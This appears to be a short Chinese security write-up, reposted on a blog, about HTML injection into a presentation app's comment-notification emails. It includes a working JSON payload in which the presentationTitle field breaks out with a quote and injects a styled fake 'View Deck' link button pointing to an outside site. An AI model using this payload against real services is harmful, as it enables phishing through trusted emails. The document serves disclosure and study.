不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

利用电子邮件中的HTML注入

HTMLi是一个在呈现HTML代码的任何应用程序中可利用的漏洞。电子邮件是其中之一。本文的其余部分说明了如何通过目标上的注释通知功能将HTML注入电子邮件中。

Part 01
记得这里未讨论的HTML注入吗?
因此,在通知电子邮件中反映了comment和presentationTitle参数的值。最初看起来如下:

{"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"This is Redacted","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted Copy www.footstep.ninja","slideLocalId":"5p3nrib"}}

然后,在为参数注入presentationTitleHTML属性后,它看起来如下所示:

{"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"Comments are great!","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted\" <br/><br/> <div style='color:#1a3a69;line-height:1.5em;font-size:18px;text-align:center'>This is a test comment</div><br/> <a style='background-color:#f68270;border:1px solid #333333;border-color:#f68270;border-radius:6px;border-width:1px;color:#ffffff;display:inline-block;font-family:arial,helvetica,sans-serif;font-size:16px;font-weight:bold;letter-spacing:0px;line-height:16px;padding:12px 18px 12px 18px;text-align:center;text-decoration:none' href='https://footstep.ninja' target='_blank' data-saferedirecturl='https://footstep.ninja'>View Deck</a> <!-- Copy https://www.footstep.ninja","slideLocalId":"5p3nrib"}}
Part 02
自然通知如下所示:
Part 03
看起来像这样;
通过查看原始消息,我得到了确切的HTML:单击省略号,然后单击“显示原始”

转自:EDI安全

赞(0) 打赏
未经允许不得转载:seo优化_前端开发_渗透技术 » 利用电子邮件中的HTML注入

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏